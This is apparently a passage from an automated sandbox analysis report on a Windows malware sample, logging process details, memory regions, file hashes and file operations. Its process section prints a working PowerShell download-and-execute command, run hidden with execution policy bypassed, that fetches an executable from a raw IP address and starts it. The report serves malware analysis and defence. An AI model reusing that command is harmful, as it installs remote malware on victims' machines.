Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x7ffc17143270 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x7ffc17148940 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x7ffc17147460 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x7ffc145a6e50 True 1
Fn
Environment (21)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 7
Fn
Data
Get Environment String name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 2
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 2
Fn
Get Environment String name = PROMPT False 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Get Environment String name = appdAta, result_out = C:\Users\Nd9E1FYi\AppData\Roaming True 2
Fn
Set Environment String name = PROMPT, value = $P$G True 1
Fn
Set Environment String name = =C:, value = C:\Users\Nd9E1FYi\Desktop True 1
Fn
Set Environment String name = COPYCMD True 1
Fn
Set Environment String name = =ExitCode, value = 00000000 True 1
Fn
Set Environment String name = =ExitCodeAscii True 1
Fn
Process #5: powershell.exe
1453 18
»
Information Value
ID #5
File Name c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass (new-object system.net.webclient).downloadfile('http://92.63.197.38/letsgo.exe?LbPUer','C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe'); staRt-ProceSS 'C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe'
Initial Working Directory C:\Users\Nd9E1FYi\Desktop\
Monitor Start Time: 00:00:24, Reason: Child Process
Unmonitor End Time: 00:03:23, Reason: Terminated by Timeout
Monitor Duration 00:02:59
OS Process Information
»
Information Value
PID 0xe98
Parent PID 0xe6c (c:\windows\system32\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username X2VS1CUM\Nd9E1FYi
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x E9C
0x EF0
0x EF4
0x EF8
0x F24
0x F28
0x F30
0x F34
0x F40
0x F64
0x F68
0x F6C
0x F70
0x F74
0x F94
0x F98
0x FB0
0x FB4
0x FD4
0x FE4
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x0000002147430000 0x2147430000 0x21474affff Private Memory Readable, Writable True False False -
private_0x00000021474b0000 0x21474b0000 0x214752ffff Private Memory Readable, Writable True False False -
private_0x0000002147530000 0x2147530000 0x21475affff Private Memory Readable, Writable True False False -
private_0x0000002147600000 0x2147600000 0x21477fffff Private Memory Readable, Writable True False False -
private_0x0000002147800000 0x2147800000 0x214787ffff Private Memory Readable, Writable True False False -
private_0x0000002147880000 0x2147880000 0x21478fffff Private Memory Readable, Writable True False False -
private_0x0000002147900000 0x2147900000 0x214797ffff Private Memory Readable, Writable True False False -
pagefile_0x0000020800000000 0x20800000000 0x208013fffff Pagefile Backed Memory Readable True False False -
pagefile_0x0000020801400000 0x20801400000 0x20801400fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000020801410000 0x20801410000 0x2080141ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000020801420000 0x20801420000 0x2080142ffff Private Memory - True False False -
private_0x0000020801430000 0x20801430000 0x20801430fff Private Memory Readable, Writable True False False -
private_0x0000020801440000 0x20801440000 0x20801440fff Private Memory Readable, Writable True False False -
private_0x0000020801450000 0x20801450000 0x208014bffff Private Memory Readable, Writable True False False -
private_0x00000208014c0000 0x208014c0000 0x208014cffff Private Memory Readable, Writable True False False -
private_0x00000208014d0000 0x208014d0000 0x208014dffff Private Memory Readable, Writable True False False -
mscorrc.dll 0x208014e0000 0x20801541fff Memory Mapped File Readable True False False -
winnlsres.dll 0x20801550000 0x20801554fff Memory Mapped File Readable False False False -
winnlsres.dll.mui 0x20801560000 0x2080156ffff Memory Mapped File Readable False False False -
pagefile_0x0000020801570000 0x20801570000 0x20801570fff Pagefile Backed Memory Readable, Writable True False False -
tzres.dll 0x20801580000 0x20801580fff Memory Mapped File Readable, Writable False False False -
tzres.dll.mui 0x20801580000 0x20801588fff Memory Mapped File Readable False False False -
private_0x0000020801580000 0x20801580000 0x2080158ffff Private Memory Readable, Writable True False False -
private_0x0000020801590000 0x20801590000 0x2080159ffff Private Memory Readable, Writable True False False -
private_0x00000208015a0000 0x208015a0000 0x208016a2fff Private Memory Readable, Writable True False False -
private_0x0000020801710000 0x20801710000 0x2080171ffff Private Memory Readable, Writable, Executable True False False -
private_0x0000020801720000 0x20801720000 0x2081971ffff Private Memory Readable, Writable True False False -
rpcss.dll 0x20819720000 0x208197fcfff Memory Mapped File Readable False False False -
private_0x0000020819720000 0x20819720000 0x2081981ffff Private Memory Readable, Writable True False False -
private_0x0000020819820000 0x20819820000 0x2081982ffff Private Memory Readable, Writable, Executable True False False -
private_0x0000020819830000 0x20819830000 0x2081992ffff Private Memory Readable, Writable True False False -
pagefile_0x0000020819930000 0x20819930000 0x20819d2afff Pagefile Backed Memory Readable True False False -
private_0x000002087ecf0000 0x2087ecf0000 0x2087ed0ffff Private Memory Readable, Writable True False False -
pagefile_0x000002087ecf0000 0x2087ecf0000 0x2087ecfffff Pagefile Backed Memory Readable, Writable True False False -
private_0x000002087ed00000 0x2087ed00000 0x2087ed06fff Private Memory Readable, Writable True False False -
pagefile_0x000002087ed10000 0x2087ed10000 0x2087ed24fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002087ed30000 0x2087ed30000 0x2087ed33fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002087ed40000 0x2087ed40000 0x2087ed40fff Pagefile Backed Memory Readable True False False -
private_0x000002087ed50000 0x2087ed50000 0x2087ed51fff Private Memory Readable, Writable True False False -
locale.nls 0x2087ed60000 0x2087ee1dfff Memory Mapped File Readable False False False -
private_0x000002087ee20000 0x2087ee20000 0x2087ee26fff Private Memory Readable, Writable True False False -
pagefile_0x000002087ee30000 0x2087ee30000 0x2087ee31fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002087ee40000 0x2087ee40000 0x2087ee40fff Pagefile Backed Memory Readable, Writable True False False -
powershell.exe.mui 0x2087ee50000 0x2087ee52fff Memory Mapped File Readable False False False -
private_0x000002087ee60000 0x2087ee60000 0x2087ef5ffff Private Memory Readable, Writable True False False -
private_0x000002087ef60000 0x2087ef60000 0x2087ef60fff Private Memory Readable, Writable True False False -
private_0x000002087ef70000 0x2087ef70000 0x2087ef70fff Private Memory Readable, Writable True False False -
private_0x000002087ef80000 0x2087ef80000 0x2087ef86fff Private Memory Readable, Writable True False False -
private_0x000002087f050000 0x2087f050000 0x2087f05ffff Private Memory Readable, Writable True False False -
private_0x000002087f080000 0x2087f080000 0x2087f08ffff Private Memory Readable, Writable True False False -
pagefile_0x000002087f090000 0x2087f090000 0x2087f217fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002087f220000 0x2087f220000 0x2087f3a0fff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x2087f3b0000 0x2087f6e6fff Memory Mapped File Readable False False False -
pagefile_0x00007df5ff7f0000 0x7df5ff7f0000 0x7ff5ff7effff Pagefile Backed Memory - True False False -
private_0x00007ff6e4220000 0x7ff6e4220000 0x7ff6e422ffff Private Memory Readable, Writable, Executable True False False -
private_0x00007ff6e4230000 0x7ff6e4230000 0x7ff6e42cffff Private Memory Readable, Writable, Executable True False False -
pagefile_0x00007ff6e42d0000 0x7ff6e42d0000 0x7ff6e43cffff Pagefile Backed Memory Readable True False False -
pagefile_0x00007ff6e43d0000 0x7ff6e43d0000 0x7ff6e43f2fff Pagefile Backed Memory Readable True False False -
powershell.exe 0x7ff6e4be0000 0x7ff6e4c57fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00007ffb9c760000 0x7ffb9c760000 0x7ffb9c76ffff Private Memory - True False False -
private_0x00007ffb9c770000 0x7ffb9c770000 0x7ffb9c77ffff Private Memory - True False False -
private_0x00007ffb9c780000 0x7ffb9c780000 0x7ffb9c80ffff Private Memory - True False False -
private_0x00007ffb9c810000 0x7ffb9c810000 0x7ffb9c87ffff Private Memory - True False False -
private_0x00007ffb9c880000 0x7ffb9c880000 0x7ffb9c8bffff Private Memory - True False False -
private_0x00007ffb9c8c0000 0x7ffb9c8c0000 0x7ffb9c8cffff Private Memory - True False False -
private_0x00007ffb9c8d0000 0x7ffb9c8d0000 0x7ffb9c8dffff Private Memory - True False False -
private_0x00007ffb9c8e0000 0x7ffb9c8e0000 0x7ffb9c8effff Private Memory - True False False -
private_0x00007ffb9c8f0000 0x7ffb9c8f0000 0x7ffb9c8fffff Private Memory - True False False -
private_0x00007ffb9c900000 0x7ffb9c900000 0x7ffb9c90ffff Private Memory - True False False -
private_0x00007ffb9c910000 0x7ffb9c910000 0x7ffb9c91ffff Private Memory - True False False -
private_0x00007ffb9c920000 0x7ffb9c920000 0x7ffb9c92ffff Private Memory - True False False -
private_0x00007ffb9c930000 0x7ffb9c930000 0x7ffb9c93ffff Private Memory - True False False -
private_0x00007ffb9c940000 0x7ffb9c940000 0x7ffb9c94ffff Private Memory - True False False -
private_0x00007ffb9c950000 0x7ffb9c950000 0x7ffb9c95ffff Private Memory - True False False -
private_0x00007ffb9c960000 0x7ffb9c960000 0x7ffb9c96ffff Private Memory - True False False -
private_0x00007ffb9c970000 0x7ffb9c970000 0x7ffb9c97ffff Private Memory - True False False -
private_0x00007ffb9c980000 0x7ffb9c980000 0x7ffb9c98ffff Private Memory - True False False -
private_0x00007ffb9c990000 0x7ffb9c990000 0x7ffb9c99ffff Private Memory - True False False -
private_0x00007ffb9c9a0000 0x7ffb9c9a0000 0x7ffb9c9affff Private Memory - True False False -
private_0x00007ffb9c9b0000 0x7ffb9c9b0000 0x7ffb9c9bffff Private Memory - True False False -
private_0x00007ffb9c9c0000 0x7ffb9c9c0000 0x7ffb9c9cffff Private Memory - True False False -
private_0x00007ffb9c9d0000 0x7ffb9c9d0000 0x7ffb9c9dffff Private Memory - True False False -
private_0x00007ffb9c9e0000 0x7ffb9c9e0000 0x7ffb9c9effff Private Memory - True False False -
private_0x00007ffb9c9f0000 0x7ffb9c9f0000 0x7ffb9c9fffff Private Memory - True False False -
private_0x00007ffb9ca00000 0x7ffb9ca00000 0x7ffb9ca0ffff Private Memory - True False False -
private_0x00007ffb9ca10000 0x7ffb9ca10000 0x7ffb9ca1ffff Private Memory - True False False -
private_0x00007ffb9ca20000 0x7ffb9ca20000 0x7ffb9ca2ffff Private Memory - True False False -
microsoft.powershell.security.ni.dll 0x7ffbf56c0000 0x7ffbf5721fff Memory Mapped File Readable, Writable, Executable True False False -
clrjit.dll 0x7ffbf5730000 0x7ffbf5834fff Memory Mapped File Readable, Writable, Executable True False False -
system.configuration.ni.dll 0x7ffbf5840000 0x7ffbf595ffff Memory Mapped File Readable, Writable, Executable True False False -
system.transactions.dll 0x7ffbf5e00000 0x7ffbf5e4cfff Memory Mapped File Readable, Writable, Executable True False False -
system.transactions.ni.dll 0x7ffbf5e50000 0x7ffbf5f26fff Memory Mapped File Readable, Writable, Executable True False False -
system.management.ni.dll 0x7ffbf65a0000 0x7ffbf66fefff Memory Mapped File Readable, Writable, Executable True False False -
system.directoryservices.ni.dll 0x7ffbf6700000 0x7ffbf6861fff Memory Mapped File Readable, Writable, Executable True False False -
system.xml.ni.dll 0x7ffbf6870000 0x7ffbf7109fff Memory Mapped File Readable, Writable, Executable True False False -
microsoft.management.infrastructure.ni.dll 0x7ffbf7110000 0x7ffbf71abfff Memory Mapped File Readable, Writable, Executable True False False -
system.numerics.ni.dll 0x7ffbf71b0000 0x7ffbf71fffff Memory Mapped File Readable, Writable, Executable True False False -
system.management.automation.ni.dll 0x7ffbf7200000 0x7ffbf9208fff Memory Mapped File Readable, Writable, Executable True False False -
microsoft.powershell.consolehost.ni.dll 0x7ffbf92b0000 0x7ffbf935bfff Memory Mapped File Readable, Writable, Executable True False False -
system.core.ni.dll 0x7ffbf9360000 0x7ffbf9ce0fff Memory Mapped File Readable, Writable, Executable True False False -
system.ni.dll 0x7ffbf9cf0000 0x7ffbfa903fff Memory Mapped File Readable, Writable, Executable True False False -
mscorlib.ni.dll 0x7ffbfa910000 0x7ffbfbdd5fff Memory Mapped File Readable, Writable, Executable True False False -
msvcr120_clr0400.dll 0x7ffbfbde0000 0x7ffbfbed6fff Memory Mapped File Readable, Writable, Executable False False False -
clr.dll 0x7ffbfbee0000 0x7ffbfc86dfff Memory Mapped File Readable, Writable, Executable True False False -
mscoreei.dll 0x7ffbfc950000 0x7ffbfc9e7fff Memory Mapped File Readable, Writable, Executable True False False -
system.configuration.install.ni.dll 0x7ffbfdbd0000 0x7ffbfdbfbfff Memory Mapped File Readable, Writable, Executable True False False -
mscoree.dll 0x7ffbfddc0000 0x7ffbfde27fff Memory Mapped File Readable, Writable, Executable True False False -
wldp.dll 0x7ffc049f0000 0x7ffc049fbfff Memory Mapped File Readable, Writable, Executable False False False -
atl.dll 0x7ffc06ba0000 0x7ffc06bbdfff Memory Mapped File Readable, Writable, Executable False False False -
secur32.dll 0x7ffc07fd0000 0x7ffc07fdbfff Memory Mapped File Readable, Writable, Executable False False False -
version.dll 0x7ffc08000000 0x7ffc08009fff Memory Mapped File Readable, Writable, Executable False False False -
cscapi.dll 0x7ffc0bfc0000 0x7ffc0bfd1fff Memory Mapped File Readable, Writable, Executable False False False -
davhlpr.dll 0x7ffc0bff0000 0x7ffc0bffbfff Memory Mapped File Readable, Writable, Executable False False False -
davclnt.dll 0x7ffc0c000000 0x7ffc0c01ffff Memory Mapped File Readable, Writable, Executable False False False -
ntlanman.dll 0x7ffc0c020000 0x7ffc0c035fff Memory Mapped File Readable, Writable, Executable False False False -
drprov.dll 0x7ffc0c040000 0x7ffc0c04afff Memory Mapped File Readable, Writable, Executable False False False -
mpr.dll 0x7ffc0c050000 0x7ffc0c06afff Memory Mapped File Readable, Writable, Executable False False False -
system.diagnostics.tracing.ni.dll 0x7ffc0caa0000 0x7ffc0caa4fff Memory Mapped File Readable, Writable, Executable True False False -
wkscli.dll 0x7ffc0f810000 0x7ffc0f825fff Memory Mapped File Readable, Writable, Executable False False False -
netutils.dll 0x7ffc12e30000 0x7ffc12e3bfff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x7ffc13030000 0x7ffc13063fff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x7ffc133a0000 0x7ffc133b6fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x7ffc134c0000 0x7ffc134cafff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x7ffc136a0000 0x7ffc136ccfff Memory Mapped File Readable, Writable, Executable False False False -
winsta.dll 0x7ffc13830000 0x7ffc13885fff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x7ffc13950000 0x7ffc13978fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x7ffc13a20000 0x7ffc13a33fff Memory Mapped File Readable, Writable, Executable False False False -
powrprof.dll 0x7ffc13a40000 0x7ffc13a8afff Memory Mapped File Readable, Writable, Executable False False False -
kernel.appcore.dll 0x7ffc13aa0000 0x7ffc13aaefff Memory Mapped File Readable, Writable, Executable False False False -
windows.storage.dll 0x7ffc13c50000 0x7ffc14293fff Memory Mapped File Readable, Writable, Executable False False False -
cfgmgr32.dll 0x7ffc14490000 0x7ffc144d2fff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x7ffc144e0000 0x7ffc14549fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x7ffc14550000 0x7ffc14737fff Memory Mapped File Readable, Writable, Executable False False False -
shcore.dll 0x7ffc14740000 0x7ffc147f4fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x7ffc14800000 0x7ffc14942fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x7ffc14950000 0x7ffc14a6bfff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x7ffc14a70000 0x7ffc15fcefff Memory Mapped File Readable, Writable, Executable False False False -
combase.dll 0x7ffc15fd0000 0x7ffc1624cfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x7ffc16250000 0x7ffc162f6fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x7ffc164b0000 0x7ffc1654cfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x7ffc16660000 0x7ffc166bafff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x7ffc167d0000 0x7ffc1680afff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x7ffc169e0000 0x7ffc16b65fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x7ffc16fb0000 0x7ffc17070fff Memory Mapped File Readable, Writable, Executable False False False -
psapi.dll 0x7ffc17080000 0x7ffc17087fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x7ffc17120000 0x7ffc171ccfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x7ffc171d0000 0x7ffc17325fff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x7ffc173a0000 0x7ffc173f1fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x7ffc17400000 0x7ffc175c0fff Memory Mapped File Readable, Writable, Executable False False False -
For performance reasons, the remaining 84 entries are omitted.
The remaining entries can be found in flog.txt.
Created Files
»
Filename File Size Hash Values YARA Match Actions
c:\users\nd9e1fyi\appdata\local\temp\4yreaw5k.md3.ps1 0.00 KB MD5: c4ca4238a0b923820dcc509a6f75849b
SHA1: 356a192b7913b04c54574d18c28d46e6395428ab
SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b 		False
...
c:\users\nd9e1fyi\appdata\local\temp\dppe3wwf.ebw.psm1 0.00 KB MD5: c4ca4238a0b923820dcc509a6f75849b
SHA1: 356a192b7913b04c54574d18c28d46e6395428ab
SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b 		False
...
c:\users\nd9e1fyi\appdata\roamingqtp35.exe 278.51 KB MD5: 64fe3cc06265bca6cc175cecfc16fc2e
SHA1: 3f02ee202bd9040c25a3caf6af905345e458dc46
SHA256: 063cf82cd52acb6a0539a6ff59f72fb5de473293a06c470a92c6d35a151b73e9 		False
...
Modified Files
»
Filename File Size Hash Values YARA Match Actions
c:\users\nd9e1fyi\appdata\local\microsoft\windows\powershell\commandanalysis\powershell_analysiscacheindex 19.46 KB MD5: 209a126e4839093dbd140950fa232dff
SHA1: a98ffb3882b8f519eede39d32935578d6e4c774b
SHA256: 8ff6e7821f5e3cea46c176bd5ccc51c24ac089de25cfa18412726d00c0d59b75 		False
...
Host Behavior
File (754)
»
Operation Filename Additional Information Success Count Logfile
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Local\Temp\4yreaw5k.md3.ps1 desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Local\Temp\dppe3wwf.ebw.psm1 desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 2
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 2
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 2
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 2
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\HelpV3.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 2
Fn
Create C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1 desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1 desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1 desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\PSReadline.psd1 desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_96fb2ebe-5768-403c-8fbc-1b0ef0323733 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1 desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1 desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1 desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 2
Fn
Create C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1 desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Create Pipe \device\namedpipe\pshost.131654663177492805.3736.defaultappdomain.powershell open_mode = PIPE_ACCESS_INBOUND, PIPE_ACCESS_OUTBOUND, FILE_FLAG_FIRST_PIPE_INSTANCE, FILE_FLAG_OVERLAPPED, pipe_mode = PIPE_READMODE_MESSAGE, PIPE_TYPE_MESSAGE, max_instances = 1 True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe.config type = file_attributes False 3
Fn
Get Info C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\typesv3.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_attributes True 4
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml type = file_attributes True 4
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml type = file_attributes True 4
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml type = file_attributes True 4
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\HelpV3.format.ps1xml type = file_attributes True 4
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml type = file_attributes True 1
Fn
Get Info STD_OUTPUT_HANDLE type = file_type True 1
Fn
Get Info - type = file_type True 1
Fn
Get Info C:\Users\Nd9E1FYi type = file_attributes True 5
Fn
Get Info C:\ type = file_attributes True 2
Fn
Get Info C:\Windows\system32\wldp.dll type = file_attributes True 18
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Local\Temp\ type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Local\Temp\4yreaw5k.md3.ps1 type = file_type True 2
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Local\Temp\dppe3wwf.ebw.psm1 type = file_type True 2
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Local\Temp\4yreaw5k.md3.ps1 type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Local\Temp\dppe3wwf.ebw.psm1 type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_type True 4
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml type = file_type True 4
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml type = file_type True 4
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml type = file_type True 4
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\HelpV3.format.ps1xml type = file_type True 4
Fn
Get Info C:\Users\Nd9E1FYi\Desktop type = file_attributes True 9
Fn
Get Info C:\Users type = file_attributes True 4
Fn
Get Info STD_INPUT_HANDLE type = file_type True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe type = file_attributes True 1
Fn
Get Info C:\ProgramData\Oracle\Java\javapath type = file_attributes True 32
Fn
Get Info C:\Windows\system32 type = file_attributes True 23
Fn
Get Info C:\Windows type = file_attributes True 16
Fn
Get Info C:\Windows\System32\Wbem type = file_attributes True 16
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\ type = file_attributes True 9
Fn
Get Info C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Modules type = file_attributes False 6
Fn
Get Info C:\Program Files\WindowsPowerShell\Modules type = file_attributes True 3
Fn
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules type = file_attributes True 3
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\AppBackgroundTask type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\AppBackgroundTask\AppBackgroundTask.psd1 type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\AppLocker type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\AppLocker\AppLocker.psd1 type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Appx type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Appx\Appx.psd1 type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\AssignedAccess type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\AssignedAccess\AssignedAccess.psd1 type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\BitLocker type = file_attributes True 1
Fn
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\BitLocker\BitLocker.psd1 type = file_attributes True 1
Fn
